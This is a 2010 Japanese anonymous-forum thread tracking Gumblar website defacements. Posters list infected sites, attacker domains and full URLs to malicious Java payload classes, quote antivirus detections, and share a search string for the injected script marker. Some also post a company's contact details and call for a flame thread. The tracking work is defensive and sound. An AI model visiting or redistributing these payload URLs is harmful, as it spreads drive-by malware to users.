325:名無しさん@お腹いっぱい。
10/01/22 11:44:05
>>323
で、今はホリプロのトップにお詫びの告知があるのか?
とてもとても見に行く気にはなれないけど

326:名無しさん@お腹いっぱい。
10/01/22 11:53:41
>>322

トレンドマイクロ サポートサービス本部 セキュリティエンハンスメントサポートグループ Threat Monitoring Center 課長の飯田朝洋氏
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです

トレンドマイクロ終了のお知らせでした


327:名無しさん@お腹いっぱい。
10/01/22 11:58:48
>>322
その記事のコメント欄に差分チェック&メール通知ASPのリンクが貼られてるね。
リンク先見てないけど宣伝?

URLリンク(websitesafe)●net/

328:名無しさん@お腹いっぱい。
10/01/22 12:03:48
>>317
> コードだけ撤去して「告知せず」かよ
そんなのいいほうだよ

URLリンク(www.ikumo-web.org)
> 2010年1月2日(土)現在、ナノインパクトのHPにアクセスすると、ウイルス対策
> ソフトがトロイの木馬を検知します。以下参考ページの内容と同様の事象と推測
> しています。

> 2010年1月6日(水)、HPの管理者より問題が解決したの連絡を受けました。当サ
> イト管理者が確認したところ、連絡を受けた通り解決してました。
>
> 原因は不正改ざんではなく、過去に作成したファイルがサーバに残っており、そ
> れが原因とのことです。また、ウイルス感染もないとのことです。

ナノインパクトのHPとやら
URLリンク(www)●nanoimpact●jp/
> 10.01.06 1月2日に一部のHPにてナノインパクトHPが不正改ざん、ウイルス感染の
> 可能性という 掲示が出ておりました。弊社で調査したところ原因は不正改ざんや
> ウイルス感染ではなく、過去に作成したファイルがサーバに残っていたために一部
> のウイルスセキュリティソフトにてウイルスと認識されておりました。該当ファイ
> ルを削除し、問題のないことを確認致しましたことをご報告致します。

ほほ~ぅ>>監視モードスタート>>
2010/01/08 9:51 改ざん(/*LGPL*/埋め込み)
2010/01/12 22:42 修復
未だ告知なし

俺の中ではこいつらが最凶

329:名無しさん@お腹いっぱい。
10/01/22 12:14:50
主流はSQLインジェクション、HPコンテンツ管理会社に責任なんか無いんだからねっ!

330:名無しさん@お腹いっぱい。
10/01/22 12:16:18
企業は正直に話したほうがいいのにw

331:名無しさん@お腹いっぱい。
10/01/22 12:25:43
GENOウイルスに対向して8080系はNANOウイルス

332:名無しさん@お腹いっぱい。
10/01/22 12:33:51
不道徳企業はリスト化するのがベスト

333:名無しさん@お腹いっぱい。
10/01/22 12:34:13
いいねえ
ことあるごとに、こっそり(のつもりで)修復して知らん振りの企業名を挙げてやればいい

334:名無しさん@お腹いっぱい。
10/01/22 12:43:40
pana持ってる奴いる?検疫になんもファイル追加出来ないんだが

335:名無しさん@お腹いっぱい。
10/01/22 12:47:31
>>326
トレンドはIDSやってないからねえ。

336:名無しさん@お腹いっぱい。
10/01/22 12:48:14
>>328
これはw

もしかして専スレde大炎上を望んでる?

337:名無しさん@お腹いっぱい。
10/01/22 12:50:23
今見たら>>235>>280は/*Exception*/だった

338:名無しさん@お腹いっぱい。
10/01/22 12:50:59
>>336
誰かν側でスレたてすれば炎上?

339:名無しさん@お腹いっぱい。
10/01/22 13:03:22
燃やすぞー

340:名無しさん@お腹いっぱい。
10/01/22 13:12:56
>>328
うわあ
なんで傷口を広げるようなことを言うかねえ

341:名無しさん@お腹いっぱい。
10/01/22 13:13:46
すみませんご迷惑をおかけしましただけで、あとは黙っておけばいいのにねー

342:名無しさん@お腹いっぱい。
10/01/22 13:23:22
>>316
URLリンク(www.google.com)

343:名無しさん@お腹いっぱい。
10/01/22 13:29:03
>>328
流石だなww

344:名無しさん@お腹いっぱい。
10/01/22 13:31:38
>>340
告知せず&意味不な事を書いて逃げるサイトは
消えて無くなった方が良いから。

隠す・逃げるサイトは徹底的に叩かれるべき


345:名無しさん@お腹いっぱい。
10/01/22 13:34:35
株式会社ユノインターナショナル
〒541-0046 大阪市中央区平野町2-3-7 アーバンエース北浜ビル12F
〒541-0041 大阪市中央区北浜1-3-14 西川三井ビルディング10F
電話 06-6231-0550
FAX 06-6231-1077
info@nanoimpact.jp

346:名無しさん@お腹いっぱい。
10/01/22 13:36:53
>>328
☆☆☆ スレ立て依頼所 ☆☆☆
スレリンク(news板)

347:名無しさん@お腹いっぱい。
10/01/22 13:39:55
馬鹿だなお前ら。黙りなんて他でもいくらでもいるだろうに

348:名無しさん@お腹いっぱい。
10/01/22 13:42:06
社員レス

349:名無しさん@お腹いっぱい。
10/01/22 13:52:15
いくらでもいるだろうけど
見つけ次第許さないよw

350:名無しさん@お腹いっぱい。
10/01/22 13:57:18
立ててみた
ナノインパクトHPウイルス感染→スクリプト埋め込みを否定
スレリンク(news板)

351:名無しさん@お腹いっぱい。
10/01/22 14:00:03
素人向けに説明しないと炎上どころか書き込みもなくなるぞ

352:名無しさん@お腹いっぱい。
10/01/22 14:01:08
ν速なんて馬鹿しかいないんだからもっとわかりやすいネタじゃないと伸びないよ
>>1なんて読まないし

353:名無しさん@お腹いっぱい。
10/01/22 14:01:16
>>350
乙と言いたいところだが・・・
説明不足だろJK・・・

354:名無しさん@お腹いっぱい。
10/01/22 14:04:58
やられたサイトなんて山のようにあるから、
マイナーサイトなんてやられてましたすいませんって謝っておくか完全無視きめこんどけば
話題にもならないのに

わざわざ嘘ついて話題になるとか狙ってんのか?

355:名無しさん@お腹いっぱい。
10/01/22 14:07:05
悪名でも有名ってことかねえ~w
経営陣が社員に恨まれてるとかかも?

356:名無しさん@お腹いっぱい。
10/01/22 14:22:51
>>328
一番たち悪いな

357:名無しさん@お腹いっぱい。
10/01/22 14:32:42
>>349
働けよ

358:名無しさん@お腹いっぱい。
10/01/22 14:34:41
たけし「働けよ」

359:名無しさん@お腹いっぱい。
10/01/22 14:44:44
ガンブラーウイルス対策まとめサイト
日本コンピュータセキュリティインシデント対応チーム協議会
URLリンク(www.nca.gr.jp)

360:名無しさん@お腹いっぱい。
10/01/22 14:50:17
自分も働いてるから許せないのに
働くことに対するポリシーの無い人は,自分さえ感染しなきゃおkなの?

361:名無しさん@お腹いっぱい。
10/01/22 14:51:15
ニートは自己の正当化しかしない

362:名無しさん@お腹いっぱい。
10/01/22 14:58:52
セキュ板ってニート少なそうな印象なんだけど
煽り文句は板別に設定すべきだと思うよ

363:名無しさん@お腹いっぱい。
10/01/22 15:27:53
セキュ板は書き込みの過半数が自宅警備員w

364:名無しさん@お腹いっぱい。
10/01/22 15:37:46
>>347
悔しかったら告知&お詫びしろ

話 は そ れ か ら だ

365:名無しさん@お腹いっぱい。
10/01/22 15:40:21
×自宅警備
○ホームセキュリティ

366:名無しさん@お腹いっぱい。
10/01/22 15:51:57
   γ⌒ヽ
   < `∀´>
  < つ=つ
  ノ   ノ三)
∠、 m)=m)

367:名無しさん@お腹いっぱい。
10/01/22 15:52:58
マジか
ホームセキュリティの人が検体送付とか電凸とかマメにしてくれてんのか

368:名無しさん@お腹いっぱい。
10/01/22 15:59:36
ネットの平和守られてんじゃん
馬鹿に出来ねえ

369:名無しさん@お腹いっぱい。
10/01/22 16:18:29
なんでlが全角になっちゃったんだろう…

『/*GNU GPL*/』→『/*LGPL*/』→『/*handle exception*/』
となってってるそうで。
難読化も無く判断しづらい物になってるらしい。悪質だね。

370:名無しさん@お腹いっぱい。
10/01/22 16:20:03
ごめんよ、ageた上に誤爆。

371:名無しさん@お腹いっぱい。
10/01/22 16:59:46
1日10アクセスもない俺の個人サイトさえ改ざんの告知したというのに告知しない企業ときたら

利用者はグーグルロボット2名でした

372:名無しさん@お腹いっぱい。
10/01/22 17:02:43
>>371
www

373:名無しさん@お腹いっぱい。
10/01/22 17:03:10
>>235
凸完了

HPを作っているのはHP製作会社ではなく
友人にお願いをして作って貰ったとか。。

374:名無しさん@お腹いっぱい。
10/01/22 17:10:50
>>371
おまえは偉い

375:名無しさん@お腹いっぱい。
10/01/22 17:12:30
URLリンク(www.nigauri.sakura.ne.jp)

376:名無しさん@お腹いっぱい。
10/01/22 17:13:16
>>371
サイト運営者の鏡だよ
アク解に残ってない閲覧者もいるかもしれないし

377:名無しさん@お腹いっぱい。
10/01/22 17:17:48
>>373
シネ基地外。何してやったりな顔してんだよw

378:名無しさん@お腹いっぱい。
10/01/22 17:19:11
>>377
あたま大丈夫か?
何に毒されたらそうなっちゃうの?

379:名無しさん@お腹いっぱい。
10/01/22 17:26:10
>>376
アクセス解析に残ってない閲覧者って何だよ?

380:名無しさん@お腹いっぱい。
10/01/22 17:28:57
>>379
アク解に残らないようにするブラウザ用アドオンとか出回ってるんだけど知らない?
hostsに書き込んで拒否してる人も結構いるし

381:名無しさん@お腹いっぱい。
10/01/22 17:30:49
Ninjaの手裏剣クルクルとかうざいからな

382:名無しさん@お腹いっぱい。
10/01/22 17:31:34
apacheのログファイル見ろksg

383:名無しさん@お腹いっぱい。
10/01/22 17:34:34
無料スペースだろどうせ

384:名無しさん@お腹いっぱい。
10/01/22 17:40:19
>>378
かわいそす

385:名無しさん@お腹いっぱい。
10/01/22 17:42:27
ぶつぶつ言っても何もかわらないよ

386:名無しさん@お腹いっぱい。
10/01/22 17:49:23
つtwitter

387:名無しさん@お腹いっぱい。
10/01/22 17:50:23
凸されてファビョってるのはされた本人かね?
そうだよねシス管として致命的だもんね
恥ずかしいよね

388:名無しさん@お腹いっぱい。
10/01/22 17:54:52
疑問
何故海外からのアクセスを許しているのか?(FTP鯖)
せめて国内オンリーにしろよ・・・

389:名無しさん@お腹いっぱい。
10/01/22 18:04:19
>>388
どうやって設定すればいいの?

390:名無しさん@お腹いっぱい。
10/01/22 18:07:56
netはじいたらyahooから更新できなくなるとか
いろんなプロバイダを使ってるから一律拒否出来ない
海外禁止ってやるのはいいが拒否するドメイン全て登録させるとか出来ない
それにもし許可リストを使うにしてもリストの管理はサーバ屋に頼めば基本有料になるはず

391:名無しさん@お腹いっぱい。
10/01/22 18:09:25
>>379
本体じゃなくGoogleキャッシュで見てるとか?

392:名無しさん@お腹いっぱい。
10/01/22 18:17:19
>>389
GeoIPとiptable等のパケットフィルタでおkだろ

393:名無しさん@お腹いっぱい。
10/01/22 18:26:50
>>391
アク解もキャッシュされてたらそれでも足跡残るよ

394:名無しさん@お腹いっぱい。
10/01/22 18:37:18
野暮な質問だけど
こういうウイルス作ったり
不正アクセスでサイト改ざんしたら捕まるの?
その主犯を捕まえることはできないの?
教えてエロイ人

395:名無しさん@お腹いっぱい。
10/01/22 18:39:23
日本でやったら日本の法律に引っかかる


396:名無しさん@お腹いっぱい。
10/01/22 18:42:54
野暮ってこんなときに使うっけ

397:名無しさん@お腹いっぱい。
10/01/22 18:48:51
PCを物理的に破壊したら器物破損もプラスされるんだっけ

398:名無しさん@お腹いっぱい。
10/01/22 18:51:37
新たに20件のサイト改ざんが明らかに~新規改ざんサイト一覧
URLリンク(www.so-net.ne.jp)

>なお、改ざんを告知せずにこっそり該当部分を修正し、何事もなかったかのように再開している
>悪質ともいえるサイトもたくさんある中、正直に改ざんの事実を告げて謝罪し、ユーザーに対応を
>促しているサイトだということを付言しておきたい。

399:名無しさん@お腹いっぱい。
10/01/22 18:57:06
>>375
ブログに貼っていい?

400:名無しさん@お腹いっぱい。
10/01/22 18:58:08
>>285,292
質問。この辺にあるアドレスが含まれてるjavaコードは
genoウイルスの可能性があるってことでいいんですか?


401:名無しさん@お腹いっぱい。
10/01/22 19:00:00
genoって言われるとなあ

402:名無しさん@お腹いっぱい。
10/01/22 19:02:55
operaのブロックコンテンツで*.ru.*入れときゃ大丈夫かな

403:名無しさん@お腹いっぱい。
10/01/22 19:10:31
.ru じゃなくなったとたんにあぼ~ん
気休めだな

404:名無しさん@お腹いっぱい。
10/01/22 19:13:13
>>401
通ってるサイトに上にあるURLが含まれた変なコードがくっ付いているんです
genoかと思って調べてたらここにたどり着きましたもので。

ウイルスじゃなくて、あまり問題ない物ならいいんですけど
メールで一言伝えようか迷ってたもんで

405:名無しさん@お腹いっぱい。
10/01/22 19:15:09
GENOじゃないきゃいいのか?w
見てやるからさらせよそのサイト

406:名無しさん@お腹いっぱい。
10/01/22 19:31:34
>見てやるからさらせよそのサイト

404が直リンする予感

407:名無しさん@お腹いっぱい。
10/01/22 19:49:21
>>284
nikkansportsって・・・
ソフト更新はしてるけどやべぇな

408:名無しさん@お腹いっぱい。
10/01/22 20:27:54
>>404
知り合いなら伝えてやればいいけど
そうじゃないなら本人じゃなく管理会社に伝えた方が正確かもしれん

409:名無しさん@お腹いっぱい。
10/01/22 21:31:26
URLリンク(www.so-net.ne.jp)

>新たなコードを埋め込まれたサイトの中には、修復済みだったはずのサイトもいくつか含まれている。
そんな間抜けな修復を行う管理者もアレだが、歯止めがかからんな
告知不足、不完全ってのもあるのかな・・・・

410:名無しさん@お腹いっぱい。
10/01/22 21:32:49
BBSecが、「Gumblar(ガンブラー)対策トータルソリューション」の販売を開始
URLリンク(www.bbsec.co.jp)

私は、こういう銭ゲバみたいなのは嫌いだ

411:名無しさん@お腹いっぱい。
10/01/22 22:18:40
スレリンク(car板:2番)
/*Exception*/

412:名無しさん@お腹いっぱい。
10/01/22 22:33:21
>>411
それ、まさかそのスレッドがやられているってこと?
正直に話してくれ

413:名無しさん@お腹いっぱい。
10/01/22 22:34:23
>正直に話してくれ
ワロタ

414:名無しさん@お腹いっぱい。
10/01/22 22:36:30
>>412
貼られてるリンク先だよ
安心しろよw

415:名無しさん@お腹いっぱい。
10/01/22 22:37:20
>>412
再感染
スレリンク(sec板:985-999番)n
スレリンク(car板:172-174番)n

416:名無しさん@お腹いっぱい。
10/01/22 22:40:44
>>411
検出NODだけ
URLリンク(www.virustotal.com)

avastには検体提出済み
誰か他のもよろしく

417:名無しさん@お腹いっぱい。
10/01/22 22:42:39
マグペケか

418:名無しさん@お腹いっぱい。
10/01/22 22:47:04
一体NODに何があったというのだ
化け物か

419:名無しさん@お腹いっぱい。
10/01/22 22:56:20
なんかのランキングだとNOD最強らしいじゃん、こないだまでゴミじゃなかった?

420:名無しさん@お腹いっぱい。
10/01/22 22:57:47
>>419
あれってあてにならないんじゃなかった?

421:名無しさん@お腹いっぱい。
10/01/22 23:00:08
SRIだろ?
あれはネタにもならない

422:名無しさん@お腹いっぱい。
10/01/22 23:06:29
まさか中の人が派生種作ってるんじゃ

423:名無しさん@お腹いっぱい。
10/01/22 23:08:01
>>411 cobalttrueblue.ru:8080

424:名無しさん@お腹いっぱい。
10/01/22 23:08:46
コバルト8080

425:名無しさん@お腹いっぱい。
10/01/22 23:13:51
>>350
見てきた

> 23 名前: モンドリ(東京都)[] 投稿日:2010/01/22(金) 16:36:14.22 ID:AdO+SHBS ?2BP(778)
> キャッシュ消せば大丈夫って
> ウイルスに詳しいGENOの店の人がいってただろ!

このレス見れただけで満足だわ 懐かしいなw色々と半年前のこと思い出したわww

426:名無しさん@お腹いっぱい。
10/01/22 23:22:05
>>398
告知もせず無視決め込んだパルコールは勝ちだな

427:名無しさん@お腹いっぱい。
10/01/22 23:27:05
白痴ランド,昨日直ってた後は告知してなかったな
このままにする気かな

428:名無しさん@お腹いっぱい。
10/01/23 00:13:41
>>411,>>416
かすぺ
> Hello,
>
>
> index.html, scooooop.html - Trojan-Downloader.JS.Pegel.c
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Regards, Vorobiov Vitaly
> Virus Analyst

429:名無しさん@お腹いっぱい。
10/01/23 00:16:52
熊親父

430:名無しさん@お腹いっぱい。
10/01/23 00:19:29
やっべかすがに見えたwwwwww

なんでかすがが出てくるんだろう


431:名無しさん@お腹いっぱい。
10/01/23 00:51:06
AVGの常駐ガードは優秀だな。

432:名無しさん@お腹いっぱい。
10/01/23 01:05:21
>>431
どこがだよ

433:名無しさん@お腹いっぱい。
10/01/23 01:26:58
過去に3回ほど何かしらに連絡したけど、改竄されてましたって告知したのは無かったな。

434:名無しさん@お腹いっぱい。
10/01/23 02:27:21
URLリンク(green)●ribbon●to/~fakestar/
/*Exception*/ さんは新型か
genuinehollywood.ruを追加

435:名無しさん@お腹いっぱい。
10/01/23 02:31:33
401 えらぁ
tkfd-shumatsu-gakko●jp

436:名無しさん@お腹いっぱい。
10/01/23 03:14:55
>>434
ribbon.toにめる

437:名無しさん@お腹いっぱい。
10/01/23 03:20:41
URLリンク(f35.aaa.livedoor)●jp/~gotozoo/
yourtruemate.ru


438:名無しさん@お腹いっぱい。
10/01/23 03:32:07
view-source: で見ても大丈夫だよね?

439:名無しさん@お腹いっぱい。
10/01/23 03:45:27
これって「*.com*.com*」で阻止できるんじゃね?



440:名無しさん@お腹いっぱい。
10/01/23 03:46:51
>>438
chromeだとview-source:で危険なサイトでブロックされると、
表示許可したときにソースではなく普通に表示されたような気がする
ブロックされなければ平気


441:名無しさん@お腹いっぱい。
10/01/23 03:53:14
GumblarCheckerの管理人さん。
もし見ていたら、「Gumblarウイルスからコンピュータを保護する」ページのFirefoxの項目は
修正することを提言しておきます。
3.6ではツール-オプション-コンテンツの「Javaを有効にする」は無くなっていますので。

FirefoxをJavaを無効にする方法はこちらを紹介した方がよいのではないでしょうか?

Java アプレットを無効にするには
URLリンク(support.mozilla.com)

442:名無しさん@お腹いっぱい。
10/01/23 03:54:16
>>437
一応そこの管理人にめるしたけど、スパム扱いされるの必至なので
ドメインから逝こうとしてライブドアかと思ったらAAA!CAFEなのね。。。

443:名無しさん@お腹いっぱい。
10/01/23 03:56:20
>>440
あんがと。
 >>437 を見てみたけど ESETでブロックされた。
怖いからもう止めますw

444:名無しさん@お腹いっぱい。
10/01/23 04:05:22
>>437
Sophosきてました。
URLリンク(www.virustotal.com)
File index.htm received on 2010.01.22 18:25:19 (UTC)
Result: 3/40 (7.50%)
Kaspersky 7.0.0.125 2010.01.22 Trojan-Downloader.JS.Pegel.c
NOD32 4797 2010.01.22 JS/TrojanDownloader.Agent.NRO
Sophos 4.50.0 2010.01.22 Troj/JSRedir-AR

445:名無しさん@お腹いっぱい。
10/01/23 04:12:47
>>411,>>416
Avira
> Filename Result
> index.html MALWARE
> The file 'index.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.33127.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>
>
> Filename Result
> scooooop.html MALWARE
> The file 'scooooop.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.505009.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

446:名無しさん@お腹いっぱい。
10/01/23 04:16:14
>>411,>>416
Fortinet
> Dear Customer,
>
> We have analyzed the sample you provided and developed the
> pattern to catch it. We will add detection for this sample
> in the next regular update.
>
> The sample you submitted will be detected as "JS/MalRedir.B!tr.dldr".
>
> Regards,
> --
> Alexandre Aumoine
> Anti-Virus Analyst, Threat Response Team - EMEA
>
> To submit a suspicious file to Fortinet:
> URLリンク(www.fortinet.com)

447:名無しさん@お腹いっぱい。
10/01/23 04:21:27
"<script>/*Exception*/ document.write("+"<script src" の検索結果 約 60,600 件
URLリンク(www.google.co.jp)


448:名無しさん@お腹いっぱい。
10/01/23 04:52:25
URLリンク(www)<)●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar
OK URLリンク(icq-com)<)●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/PayloadX●class
OK URLリンク(icq-com)<)●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/LoaderX●class
許可しました URLリンク(icq-com)●bangbros1●com●adsrevenue-net●genuinecolors●ru:8080/pics/myf/y/AppletX●class

再現しようとしてもカスペのログに何も表示されません。
OKしたものや最後の許可で私が感染済なので無反応なのでしょうか?

449:名無しさん@お腹いっぱい。
10/01/23 05:00:09
■Gumblar.cn(Gumblar、Gumblar.x)
現在冬眠中。のはずだが・・
URLリンク(www.google.com)
センセイは毎日捕捉中w

■Gumblar.8080系(と呼ぶことになったらしい)
/*LGPL*/:ちょっと迷走した後/*Exception*/に進化
※世界各地で絶賛バージョンアップ中。
検索ワード:"<script>/*Exception*/ document.write("+"<script src"

/*CODE1*/:弾かれまくるので追跡を断念
※情報求ム

■何故かスルーされる亜種っぽいやつ
<script>function~:8080系の亜種?
少しずつ減ってきたっぽい。

450:名無しさん@お腹いっぱい。
10/01/23 05:21:17
>>448
一度アクセスしたIPははじかれるらしいので試すならIP変えないとだめだね
でもそういうデザインの感染サイトすごくいっぱいあるよね

451:名無しさん@お腹いっぱい。
10/01/23 07:45:55 BE:603512238-PLT(12031)
>>441
直しました
IETabが3.6に対応したらまた書き直す

452:名無しさん@お腹いっぱい。
10/01/23 10:18:17
関西の自主上映団体
URLリンク(www.rcsmovie.co)●jp/

453:名無しさん@お腹いっぱい。
10/01/23 10:31:19
>>452
ワーオ、そこ京都(大阪でも?)ではそこそこ有名よ~
単館上映映画見る人がかなりチェックしてると思う。

454:名無しさん@お腹いっぱい。
10/01/23 11:06:41
串通せば感染する。

ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが
Gumblar感染後、forhomessale.ru の名前解決に失敗してるっぽい、、、

それでもFTPアカウントは窃取されんのかな?

455:名無しさん@お腹いっぱい。
10/01/23 11:09:57
>>452
Last-Modified: Fri, 22 Jan 2010 11:53:46 GMT

456:名無しさん@お腹いっぱい。
10/01/23 11:53:40
>>442
似たようなサイト作ってるんで,そのメールアドレスから送信しておいたよ。
キャッシュにはAvast5反応してくれるんだけど,トップページのにはまだ
反応してくれない。次の更新で対応してくれてればいいけど。

457:名無しさん@お腹いっぱい。
10/01/23 11:54:51
>>449
> ■Gumblar.cn(Gumblar、Gumblar.x)

Gumblar.xはGumblar(GENO)とは別にして欲しい

458:名無しさん@お腹いっぱい。
10/01/23 12:13:26
>>452
URLリンク(www.google.co.jp)
凸完了
感染は以前もあり、対応済みとのことww

459:名無しさん@お腹いっぱい。
10/01/23 12:16:43
対応ってのは「改竄部分を消して元に戻す」って意味だろうな
鍵を代えるだの穴を塞ぐだのではなく

460:名無しさん@お腹いっぱい。
10/01/23 12:31:42
>>458
乙です。
どんな対策か気になりますね

461:名無しさん@お腹いっぱい。
10/01/23 13:28:40
>>460
期待は出来ないと考えた方がいいかもです

HPを作っている方は専門会社ではなく
ボランティアスタッフが作っているとか

映画チケットを貰ってるそうなので
無料奉仕ではなさそうですが

462:名無しさん@お腹いっぱい。
10/01/23 14:12:08
>>448 でじろく
>>452 whois上流のとこ (´-`).。oO(届いてくれればいいなぁ…)
それぞれめる

>>461
お疲れ様です。
まだ直ってなかったので上流にめるしました。

463:名無しさん@お腹いっぱい。
10/01/23 14:31:08
見逃してたm(_ _)m
>>456
乙です。
助かります。

464:名無しさん@お腹いっぱい。
10/01/23 15:19:57
www●minami-aoyama●info/
genuinehollywood●ru:8080


札幌市公園緑化協会直ったんじゃなかったっけ?
リンク元はなさそうだから残骸っぽいけど、日付が
www●sapporo-park●or●jp/blog_odori/wp-includes/js/tinymce/utils/mctabs●js
Last-Modified: Fri, 22 Jan 2010 01:49:02 GMT

www●sapporo-park●or●jp/blog_nishioka/wp-includes/js/scriptaculous/dragdrop●js
Last-Modified: Fri, 22 Jan 2010 01:20:42 GMT
genuinehollywood●ru:8080


ちなみに、index●php はどうやってデコードしてるんですか?




465:名無しさん@お腹いっぱい。
10/01/23 15:20:54
Vista/7でIEの保護モード使ってる奴すくなすぎだろ
保護モード使えばブラウザやプラグインのバグで無警告でやられるのなんて無いだろ
警告メッセージがでてOKだせばやられるとかだし

466:名無しさん@お腹いっぱい。
10/01/23 15:30:03
>>465
埋め込み動画が再生出来ない・・・
URLリンク(www.katch.ne.jp)

467:名無しさん@お腹いっぱい。
10/01/23 15:49:20
>>465
みんな使ってると思うが
統計でも取ったのか?

468:名無しさん@お腹いっぱい。
10/01/23 17:00:25
>>465
今回は関係ないけど、常に穴があると思って用心したほうが良いよ。

URLリンク(slashdot.jp)
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる

URLリンク(japan.zdnet.com)
マイクロソフト、32ビットWindowsカーネルの脆弱性について警告

469:名無しさん@お腹いっぱい。
10/01/23 18:34:31
また火狐野朗がなんかいっちゃってるのか
LINDOWS?つかえって

470:名無しさん@お腹いっぱい。
10/01/23 18:46:32
lindowsってザンドロスに吸収されたんだっけ

471:名無しさん@お腹いっぱい。
10/01/23 18:53:00
Windows以外を使うってのも、ありと言えばありだろう。

472:名無しさん@お腹いっぱい。
10/01/23 19:03:21
今頃になってこのスレ読んで、なんか甘く見ていた感
FxとIE8併用だけどIEはしばらく開かんとこう・・
AVも気休め程度のAVGじゃ不安だ。不安すぐる。

473:名無しさん@お腹いっぱい。
10/01/23 19:11:44
なんか面倒だからブラウザから8080への通信をブロックすることにした。
ポート変われば意味ないだろうけど。

474:名無しさん@お腹いっぱい。
10/01/23 20:17:21
対策してればFxもIEも同じだよ


475:名無しさん@お腹いっぱい。
10/01/23 23:37:29
Gumblar[ガンブラー](複数の亜種を含む)ウイルスの感染拡大と対策のお願い
URLリンク(www.sakura.ad.jp)

ガンブラー再燃を契機にセキュリティの基本を見直そう
URLリンク(itpro.nikkeibp.co.jp)

埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん
URLリンク(www.so-net.ne.jp)

ガンブラーと呼ばれている一連のサイト改ざん(Gumblar.x、8080)は、
ウイルスに感染したサイト管理者のパソコンから
サイト更新用のFTPアカウントを盗み出し、それを使って行っている。
SQLインジェクションのようにWebサイトの穴を探して入り込んでくるのではなく、
正面玄関から堂々と入って来てしまうのだ。

476:名無しさん@お腹いっぱい。
10/01/23 23:44:34
電子立国の総本山、JEITAがガンブラー被害
URLリンク(www.yomiuri.co.jp)

477:名無しさん@お腹いっぱい。
10/01/23 23:55:25
>>475
【トレンドマイクロ】
 \(^o^)/オワタ


478:名無しさん@お腹いっぱい。
10/01/23 23:57:58
ガハハ

479:名無しさん@お腹いっぱい。
10/01/23 23:58:09
またアンチウイルス戦争始めるのか

480:名無しさん@お腹いっぱい。
10/01/24 00:21:20
ちょいオモロイ奴があったんだけど

URLリンク(ameblo.jp)
> 2010-01-21 15:50:20
> 当事務所のホームページ「カーポスト」が
> 年明けのいつごろかにgumplerにより改ざんされておりました。
> サーバー会社と連携して、現在感染しているファイルが
> ないことを確認致しました。

これって、/*GNU GPL*/が入ってるここのことだよな
URLリンク(www)<)●125●153●132/search?q=cache:lbVrFVlo7lYJ:www.car-post.jp/&cd=1&hl=ja&ct=clnk&gl=jp
このページは 2010年1月13日 16:13:55 GMT に取得されたものです

/*LGPL*/が入ってたんだな……えっ

某日 /*LGPL*/ ハケーン
19日 (/*GNU GPL*/入り)バックアップから復旧しますた
21日 サーバー会社と連携して、現在感染しているファイルがないことを確認致しました(キリッ!)

って話なのか
詳しい奴教えてくれ


481:名無しさん@お腹いっぱい。
10/01/24 00:25:10
俺いまノーガードなんだけど、火狐の「RequestPolicy」ってアドオンだけで問題ないなw
>>448のサイトも、ちゃんとアクセスをブロックしてるログでてる。

この手の、他サイトへアクセスしてウイルスに感染させるタイプにすごく有効じゃね?

482:448
10/01/24 00:27:55
>>5>>8(11)の感染確認をして記述やファイルがなく、カスペのフルスキャンで何も出てこなければ感染はしていないと思っていいのでしょうか?
WinXPSP3でKaspersky Internet Security 2010を使っています。

483:名無しさん@お腹いっぱい。
10/01/24 00:32:33
>>482
亜種が生まれ続けているので感染していないと言い切れない

484:名無しさん@お腹いっぱい。
10/01/24 00:34:16
>>480
URLリンク(www)●car-post●jp/
いまみてきた
/*GNU GPL*/いたお

485:名無しさん@お腹いっぱい。
10/01/24 00:35:48
>>480
サーバー会社もろとも終わってるな
halfsite.ruか

486:名無しさん@お腹いっぱい。
10/01/24 00:37:14 BE:502926454-PLT(12031)
Microsoft Baseline Security Analyzer 2.1を使ったセキュリティスキャン
URLリンク(gumblarchecker.crz.jp)
追加

487:名無しさん@お腹いっぱい。
10/01/24 00:39:33
>>482
心配な場合はOS入れなおしが精神的にも安心安全

488:名無しさん@お腹いっぱい。
10/01/24 00:40:17
>>480
RequestPolicyで確認したお!怪しいのブロックしてるお!ww

489:名無しさん@お腹いっぱい。
10/01/24 00:41:14
次はRequestPolicyか
火狐野朗が

490:名無しさん@お腹いっぱい。
10/01/24 00:48:13
>>486


491:448
10/01/24 01:34:42
>>483,>>487
少し不安は残りますが>>6の更新とアンチウイルスソフトのアップデートをまめにしつつしばらくこのままで行こうと思います。

492:名無しさん@お腹いっぱい。
10/01/24 01:37:37
>>464
上:さくら
下:そこだけじゃないことを確認/*Exception*/ blogがいくつか… 作業中

> index●php はどうやってデコードしてるんですか?
上のほうにあるスクリプトのこと?
メモ帳でガリガリ

493:名無しさん@お腹いっぱい。
10/01/24 01:51:06
>>492勘違い>>464の下だけっぽい。。。orz......
作業にもどります。

494:名無しさん@お腹いっぱい。
10/01/24 01:57:54
あー、/wp-includes/js/かお。。。

495:名無しさん@お腹いっぱい。
10/01/24 01:57:59
>>444
粕は、まとめて検出の後任が
どうもTrojan-Downloader.JS.Gumblar.x (Gumblar) から
現段階Trojan-Downloader.JS.Pegel.c (.Pegel) になった模様。

URLリンク(www.kaspersky.com)
URLリンク(www.kaspersky.com)

ペ? ペゲ? ペジ?

496:名無しさん@お腹いっぱい。
10/01/24 02:01:11
ここは2ちゃんらしくプゲラウィルスと呼ぶべきかと。

497:名無しさん@お腹いっぱい。
10/01/24 03:11:28
>>464
下:とりあえずwhoisからめる

498:名無しさん@お腹いっぱい。
10/01/24 03:42:06
パトラッシュ、僕はもう疲れたよ・・・
ベンダーに任せるよ・・・

499:名無しさん@お腹いっぱい。
10/01/24 03:42:52
>>480
これはもうどこに通報すればいいんだろ。。。

500:名無しさん@お腹いっぱい。
10/01/24 03:51:12
